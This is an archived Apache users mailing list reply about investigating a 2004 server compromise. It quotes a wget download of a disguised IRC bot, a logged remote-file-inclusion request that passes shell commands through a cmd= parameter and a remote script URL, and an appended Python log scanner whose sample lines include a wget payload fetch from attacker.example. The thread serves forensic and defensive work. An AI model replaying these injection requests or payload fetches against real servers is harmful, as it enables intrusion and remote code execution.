httpd-users mailing list archives

From "Ivan Barrera A." <Br...@Ivn.cl>
Subject Re: [users@httpd] Security issue with 2.0.50
Date Sat, 04 Dec 2004 03:13:00 GMT
Hi

Glad we agree :P

Following the safe_mode = off issue: a friend of mine is using some 
kind of "online shop service" (don't know which one), and whenever we try 
to put safe_mode=on the shop says that it can't access the tmp dir (/tmp) to 
use sessions and other stuff.
I tried creating and configuring a user-local tmp dir, with no luck 
(obviously modifying the source code).
I think this is a coding problem, but he doesn't want to recode the system 
(typical user excuse "it worked before"). Any hints?

Well, any pointers will be well received :)

Be Excellent to each other !!

Shannon Eric Peevey wrote:
> 
>>> --22:56:25--  http://www.security.cnc.net/qmail.tgz
>>>           => `qmail.tgz'
>>> Resolving www.security.cnc.net... done.
>>> Connecting to www.security.cnc.net[207.155.248.45]:80... connected.
>>> HTTP request sent, awaiting response... 200 OK
>>> Length: 211,097 [application/x-compressed]
>>>
>>>    0K .......... .......... .......... .......... .......... 24%   
>>> 46.82 KB/s
>>>   50K .......... .......... .......... .......... .......... 48%   
>>> 77.16 KB/s
>>>  100K .......... .......... .......... .......... .......... 72%   
>>> 62.27 KB/s
>>>  150K .......... .......... .......... .......... .......... 97%   
>>> 75.30 KB/s
>>>  200K ......                                                100%  
>>> 192.17 KB/s
>>>
>>> 22:56:29 (64.12 KB/s) - `qmail.tgz' saved [211097/211097]
>>> ------------------------------------------------------------------------------------------
>>>
>>>
>>> Today I upgraded to 2.0.52 and re-checked my httpd.conf file. Until 
>>> now everything's ok, but if somebody can explain what I 
>>> experienced I'd be grateful. I read on some sites about a worm 
>>> exploiting a vulnerability in OpenSSL, but I'm not sure if that's the 
>>> case.
>>
>>
> I downloaded the qmail.tgz, and it is really EnergyMech in disguise:
> 
> http://www.energymech.net/
> 
> It seems like IRC bots, bombs, etc., are about the most popular uses for 
> these types of hacks.
> First, I would rebuild the machine,  (After you do some forensic 
> analysis, of course :) ).  I agree with Ivan on this, though it could 
> also be safe_mode=off, or php 4.3.8 was also vulnerable to a file upload 
> vulnerability:
> 
> http://securityfocus.net/bid/11190/info/
> 
> I would look through your apache logs for shell commands, such as wget, 
> ls, etc., and you might be able to trace the exact vulnerability that 
> these people used.  Here is an example from a machine that was exploited 
> with a safe_mode=off exploit:
> 
> access_log:68.223.190.5 - - [29/Oct/2004:10:20:08 -0500] "GET 
> /pollvote/pollvote.php?pollname=http://www.ka0ticl4b.hpgvip.com.br/cse.jpg?&cmd=id;uname%20-a
> HTTP/1.1" 200 1119 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 
> 5.1)" 1101/3049 (36%)
> 
> You'll notice the commands after 'cmd='.  (Exploiting a file in the 
> pollvote application).
> 
> Let me know what you find.  (Contact me offlist, if you would like some 
> help).
> 
> thanks,
> 

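Shannon's advice above, checking access_log for shell commands such as wget or ls smuggled through a cmd= parameter and for a parameter whose value is itself a URL (the pollvote remote-include pattern), as an added example that is not code from this thread: a small Python scanner over constructed log lines modelled on the quoted entry. The IPs and domains in the sample lines are constructed placeholders.

```python
import re
from urllib.parse import urlsplit, unquote

# Apache combined log line layout, as in Shannon's access_log excerpt.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# Shell commands typically seen after cmd= (e.g. cmd=id;uname -a) as whole words.
SHELL_TOKENS = re.compile(r'(?:^|[;|&`\s])(?:id|uname|wget|curl|ls|cat|chmod|perl|sh)\b')
# A parameter value that is itself a URL points at remote file inclusion.
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample lines (placeholder IPs/domains), mirroring the quoted entry.
SAMPLE_LOG = [
    '203.0.113.5 - - [29/Oct/2004:10:20:08 -0500] "GET /pollvote/pollvote.php'
    '?pollname=http://attacker.example/cse.jpg?&cmd=id;uname%20-a HTTP/1.1" 200 1119 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [29/Oct/2004:10:21:30 -0500] "GET /pollvote/pollvote.php'
    '?pollname=weekly HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [29/Oct/2004:10:22:11 -0500] "GET /index.php'
    '?page=http://attacker.example/s.txt?&cmd=wget%20http://attacker.example/x.tgz HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
]

def inspect_line(line):
    """Return findings for one log line as (kind, param, decoded_value) tuples."""
    m = LOG_RE.match(line)
    if not m:
        return []
    findings = []
    query = urlsplit(m.group("target")).query
    for pair in query.split("&"):          # split before decoding so %26 stays inside a value
        name, _, raw = pair.partition("=")
        value = unquote(raw)
        if REMOTE_URL.match(value):
            findings.append(("remote_include", name, value))
        if SHELL_TOKENS.search(value):
            findings.append(("shell_command", name, value))
    return findings

def scan(lines):
    """Group findings by client IP so the offending source stands out."""
    hits = {}
    for line in lines:
        found = inspect_line(line)
        if found:
            hits.setdefault(line.split(" ", 1)[0], []).extend(found)
    return hits

if __name__ == "__main__":
    for ip, found in scan(SAMPLE_LOG).items():
        print(ip, found)
```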
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org

